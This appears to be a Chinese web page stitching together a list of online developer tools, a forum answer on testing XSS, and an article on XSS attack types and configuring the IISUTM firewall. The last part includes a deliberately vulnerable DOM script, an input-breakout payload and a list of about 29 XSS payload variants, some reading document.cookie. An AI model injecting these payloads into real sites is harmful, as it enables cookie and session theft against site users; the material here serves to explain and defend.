目录介绍：

• 1、网页设计师非常有用的几个在线工具
• 2、如何测试XSS漏洞
• 3、哪有放XSS跨站脚本工具的第三方工具/

网页设计师非常有用的几个在线工具

时间戳转换

功能简介：Unix时间戳和北京时间互转、获取时间戳方法

地址：

代码对比/归并

功能简介：在线检测/比较两个文件文本的不同

地址：

LESS编译器

功能简介：将LESS代码编译成CSS代码，方便前端人员使用

地址：

crontab表达式

功能简介：根据crontab表达式计算未来N次的执行时间

地址：

代码格式化

功能简介：可以对SQL、XML、JSON代码进行格式化和美化

地址：

编码转换

功能简介：URL解码、Native转UTF-8、Native转ASCII

地址：

网页调色板

功能简介：网页颜色选择器、颜色代码查询、RGB颜色值参考

地址：

正则表达式

功能简介：正则表达式匹配和替换、多种常用正则表达式

地址：

答题

功能简介：学霸，快来做题，提升一下你的技能吧

地址：

Markdown

功能简介：将web上的文本转换成HTML文档

地址：

UBB编译器

功能简介：UBB是一种网页中的替代HTML代码的安全代码

地址：

进制转换

功能简介：2~36进制之间任意进制转换，支持浮点型

地址：

CSV转HTML

功能简介：将CSV数据转换为HTML的表格,并展示在页面上

地址：

HTML特殊符号

功能简介：HTML特殊字符编码大全

地址：

XML转JSON

功能简介：XML和JSON的内容和输出互相转换

地址：

HTML转JS

功能简介：HTML和JS的内容和输出互相转换

地址：

js/css压缩

功能简介：在线压缩Javascript和CSS代码

地址：

网页常用字体

功能简介：总结了各种常见的网页字体的显示效果

地址：

Cron生成器

功能简介：可以在线生成任务调度Quartz的Cron表达式

地址：

JSON格式化

功能简介：Json解析、验证、格式化、压缩、以及Json与XML相互转换

地址：

SQL格式化

功能简介：sql在线美化、格式化、脚本压缩

地址：

端口扫描

功能简介：扫描常用或指定的端口，查看端口是否开放

地址：

Base64编码解码

功能简介：将字符base64编码加密,或者将base64加密的字符还原

地址：

MD5加密

功能简介：生成32位和16位的大写和小写的密文

地址：

摩斯电码

功能简介：在线摩斯电码加密解密

地址：

IP查询

功能简介：查询IP或域名的地理位置和宽带供应商、查看本机IP

地址：

文字加密解密

功能简介：支持AES、DES、RC4、Rabbit 等多种算法

地址：

HTTP状态查询

功能简介：检测网页返回的HTTP状态码

地址：

生成htpasswd

功能简介：生成htpasswd

地址：

favicon图标制作

功能简介：将上传图像剪切并生成ico格式的图标

地址：

传图识字

功能简介：可以将一段含有英文文字的照片免费转化成文字

地址：

gif图制作

功能简介：一键生成gif动态图、闪图和搞笑表情包

地址：

生成二维码

功能简介：可以设置图像格式、容错率、大小、颜色及LOGO

地址：

图片转pdf

功能简介：在线免费将多张图片转成pdf文档，一键生成pdf文档

地址：

人脸识别

功能简介：在线人脸识别，自动识别人脸批量裁剪出头像图片

地址：

DIY卡通头像

功能简介：免费的动漫人物制作工具，可以随心定制男女卡通头像

地址：

传图识色

功能简介：可以识别出光标所在处图片的颜色，并提取出图片的主色调

地址：

手绘图片

功能简介：可以自动生成手绘风格照片，还可以改变照片的模糊度

地址：

图片转Base64

功能简介：图片和Base64编码互转

地址：

衣服尺码计算

功能简介：输入你的身高体重，即可计算出你需要的衣服尺寸

地址：

身份证信息查询

功能简介：输入身份证号，查询归属地、性别和出生年月

地址：

科学计算器

功能简介：开方(√)、圆周率(π)、倒数(1/x)、正弦(Sin)

地址：

大小写转换

功能简介：可以实现人民币数字大写转换和英文大小写转换

地址：

日期间隔计算

功能简介：一款可以计算两个日期之间的天数的工具

地址：

汉字转拼音

功能简介：可以将汉字转化为带声调的拼音

地址：

文字去重

功能简介：该工具可得到无重复数据的文字

地址：

单位换算器

功能简介：长度、面积、重量、温度等单位一键对等转换

地址：

中文简繁转换

功能简介：将输入的一段文字转换为简体或繁体

地址：

阴阳历转换

功能简介：支持农历公历互查，公历和农历互相转换

地址：

邮编区号查询

功能简介：输入省份、城市、区号或邮编查询该地区号

地址：

字数统计

功能简介：快速计算文章中汉字、标点、英文和数字的个数

地址：

如何测试XSS漏洞

XSS跨站漏洞分为大致三种：储存型XSS，反射型XSS，和DOM型XSS，一般都是由于网站对用户输入的参数过滤不严格而调用浏览器的JS而产生的。XSS几乎每个网站都存在，google，百度，360等都存在，存在和危害范围广，危害安全性大。

具体利用的话：

储存型XSS，一般是构造一个比如说"scriptalert("XSS")/script"的JS的弹窗代码进行测试，看是否提交后在页面弹窗，这种储存型XSS是被写入到页面当中的，如果管理员不处理，那么将永久存在，这种XSS攻击者可以通过留言等提交方式，把恶意代码植入到服务器网站上， 一般用于盗取COOKIE获取管理员的信息和权限。

反射型XSS，一般是在浏览器的输入栏也就是urlget请求那里输入XSS代码，例如：127.0.0.1/admin.php?key="scriptalert("xss")/script，也是弹窗JS代码。当攻击者发送一个带有XSS代码的url参数给受害者，那么受害者可能会使自己的cookie被盗取或者“弹框“，这种XSS一次性使用，危害比储存型要小很多。

dom型：常用于挖掘，是因为api代码审计不严所产生的，这种dom的XSS弹窗可利用和危害性并不是很大，大多用于钓鱼。比起存储型和反射型，DOM型并不常用。

缺点：

1、耗时间

2、有一定几率不成功

3、没有相应的软件来完成自动化攻击

4、前期需要基本的html、js功底，后期需要扎实的html、js、actionscript2/3.0等语言的功底

5、是一种被动的攻击手法

6、对website有http-only、crossdomian.xml没有用

所以楼主如果想更加深层次的学习XSS的话，最好有扎实的前后端开发基础，还要学会代码审计等等。

推荐的话，书籍建议看看《白帽子讲web安全》，《XSS跨站脚本攻击剖析与防御》

一般配合的话，kalilinux里面的BEFF是个很著名的XSS漏洞利用工具，楼主有兴趣可以去看看。

纯手工打字，望楼主采纳。

哪有放XSS跨站脚本工具的第三方工具/

不修改网站程序,使用第三方工具来防范XSS跨站式脚本攻击

网站要怎么防范常见的XSS跨站式脚本攻击呢，我们先从XSS跨站式脚本攻击的原理来说起。

网站遭受XSS跨站式脚本攻击的基本原理

1.本地利用漏洞，这种漏洞存在于页面中客户端脚本自身。

其攻击过程如下所示：

A给B发送一个恶意构造了Web的URL。

B点击并查看了这个URL。

恶意页面中的JavaScript打开一个具有漏洞的HTML页面并将其安装在B电脑上。

具有漏洞的HTML页面包含了在B电脑本地域执行的JavaScript。

A的恶意脚本可以在B的电脑上执行B所持有的权限下的命令。

2反射式漏洞，这种漏洞和本地利用漏洞有些类似，不同的是Web客户端使用Server端脚本生成页面为用户提供数据时，如果未经验证的用户数据被包含在页面中而未经HTML实体编码，客户端代码便能够注入到动态页面中。

其攻击过程如下：

A经常浏览某个网站，此网站为B所拥有。B的站点运行A使用用户名/密码进行登录，并存储敏感信息（比如银行帐户信息）。

C发现B的站点包含反射性的XSS漏洞。

C编写一个利用漏洞的URL，并将其冒充为来自B的邮件发送给A。

A在登录到B的站点后，浏览C提供的URL。

嵌入到URL中的恶意脚本在A的浏览器中执行，就像它直接来自B的服务器一样。此脚本盗窃敏感信息（授权、信用卡、帐号信息等）然后在A完全不知情的情况下将这些信息发送到C的Web站点。

3存储式漏洞，该类型是应用最为广泛而且有可能影响到Web服务器自身安全的漏洞，骇客将攻击脚本上传到Web服务器上，使得所有访问该页面的用户都面临信息泄漏的可能，其中也包括了Web服务器的管理员。

其攻击过程如下：

B拥有一个Web站点，该站点允许用户发布信息/浏览已发布的信息。

C注意到B的站点具有存储式的XXS漏洞。

C发布一个热点信息，吸引其它用户纷纷阅读。

B或者是任何的其他人如A浏览该信息，其会话cookies或者其它信息将被C盗走。

类型A直接威胁用户个体，而类型B和存储式漏洞所威胁的对象都是企业级Web应用。

网站遭受XSS跨站式脚本攻击的基本方式

1. DOM-based cross-site scripting

页面本身包含一些DOM对象的操作，如果未对输入的参数进行处理，可能会导致执行恶意脚本。如下面一些DOM操作：

document.URL

document.URLUnencoded

document.location (and many of its properties)

document.referrer

window.location (and many of its properties)

举个例子，假如某个脆弱的页面的代码如下：

HTML

TITLEWelcome!/TITLE

Hi

SCRIPT

var pos=document.URL.indexOf("name=")+5;

document.write(document.URL.substring(pos,document.URL.length));

/SCRIPT

BR

Welcome to our system

…

/HTML

攻击者使用如下的URL访问时，则非常危险：

;scriptalert(document.cookie)/script

试了一下，貌似IE、FireFox等浏览器默认 对scriptalert(document.cookie)/script进行了编码，阻止了脚本的执行。但是对于 DOM操作还是要更加谨慎啊，比如把上面的页面修改一下，安全性就增强了不少：

SCRIPT

var pos=document.URL.indexOf("name=")+5;

var name=document.URL.substring(pos,document.URL.length);

if (name.match(/^[a-zA-Z0-9]$/))

{

document.write(name);

}

else

{

window.alert("Security error");

}

/SCRIPT

2. Reflected cross-site scripting

也被称为None-Persistent cross-site scripting，即，非持久化的XSS攻击，是我们通常所说的，也是最常用，使用最广的一种方式。它通过给别人发送带有恶意脚本代码参数的URL，当 URL地址被打开时，特有的恶意代码参数被HTML解析、执行。它的特点是非持久化，必须用户点击带有特定参数的链接菜能引起。

3. Persistent cross-site scripting

持久化XSS攻击，指的是恶意脚本代码被存储进被攻击的数据库，当其他用户正常浏览网页时，站点从数据库中读取了非法用户存入非法数据，恶意脚本代码被执行。这种攻击类型通常在留言板等地方出现。

实施方式

我们来试一把Reflected cross-site scripting。当我们在某网站输入参数XXX，发现参数XXX原样的出现在了页面源码中：

1. input type="text" class="c696-3316-9aae-e570 Seach" name="w" value="XXX" /

OK，可以开始做文章了，我们将XXX替换为：abc"/scriptalert('haha')/scripta href="，返回的HTML代码如下：

1. input type="text" class="3316-9aae-e570-1fb2 Seach" name="w" value="abc"/

2. scriptalert('haha')/script!--" /

这样，scriptalert('haha')/script被执行了。这里再举例一些XSS攻击行为：

1. IMG SRC="javascript:alert('XSS');"

2. IMG SRC=javascript:alert('XSS')

3. IMG SRC="javascript:alert(String.fromCharCode(88,83,83))"

4. IMG SRC="jav ascript:alert('XSS');"

5. SCRIPT/XSS SRC=""/SCRIPT

6. SCRIPTalert("XSS");///SCRIPT

7. iframe src=

8. INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"

9. BODY BACKGROUND="javascript:alert('XSS')"

10. BODY ONLOAD=alert(document.cookie)

11. BODY onload!#$%()*~+-_.,:;?@[/|"]^`=alert("XSS")

12. IMG DYNSRC="javascript:alert('XSS')"

13. IMG DYNSRC="javascript:alert('XSS')"

14. BR SIZE="{alert('XSS')}"

15. IMG SRC='vbscript:msgbox("XSS")'

16. TABLE BACKGROUND="javascript:alert('XSS')"

17. DIV STYLE="width: expression(alert('XSS'));"

18. DIV STYLE="background-image: url(javascript:alert('XSS'))"

19. STYLE TYPE="text/javascript"alert('XSS');/STYLE

20. STYLE type="text/css"BODY{background:url("javascript:alert('XSS')")}/STYLE

21. ?='SCRIPTalert("XSS")/SCRIPT'?

22. A HREF="javascript:document.location=''"XSS/A

23. IMG SRC=javascript:alert('XSS')

24. EMBED SRC="" AllowScriptAccess="always"/EMBED

25. a="get";

26. b="URL(""";

27. c="javascript:";

28. d="alert('XSS');"")";

29. eval(a+b+c+d);

总结一下，要防止XSS跨站式脚本攻击主要是要在查询字符串(QueryString)，表单数据（PostData）以及Cookie甚至HTTP报头（Header）中防止掉一些javascript关键字和一些敏感的字符（单引号，分号）以及SQL语言的关键字，以及防止他们使用encode编码。

用ASP或者PHP脚本来实现上面的这些想起来就很麻烦。下面就来介绍下用一个第三方工具IISUTM来处理上面我们说到的问题。

准备工作：先去下载最新的IISUTM版本。

根据IISUTM网站防火墙安装及操作手册 中的说明把IISUTM部署到你的服务器上来，这里需要注意的是使用Windows 2003+iis6的服务器，需要开启iis中“以IIS5.0 隔离模式运行 www 服务”选项才能正常使用该软件。

安装完成，通过浏览器访问IISUTM的配置管理界面默认的是，这个是私有地址，只能在该服务器上访问，你需要任何地方都能访问的话，可以在安装的时候IP地址的选项那里填入你服务器的公网IP地址，和你所开放的端口。这样你就可以通过你配置的地址进行访问，或者你可以在iis中直接管理名为IISUTM的站点。

登陆管理界面后点击上面导航栏中的“基本设置”，然后点击左边菜单的“防XSS攻击”链接。

开启该链接里所有的选项，选中之后IISUTM会自动保存配置，下面的“使用不允许的发送序列”是该软件提供的XSS攻击关键字的特征库，你可以根据你网站的情况进行更改（最好不要修改）。

确认以上的配置以后，你可以返回到IISUTM管理界面的首页，这里会列出最近服务器遭受到的攻击以及详细，赶紧去看看你的网站是不是随时有人在进行SQL注入吧，以及哪些攻击被IISUTM处理掉了。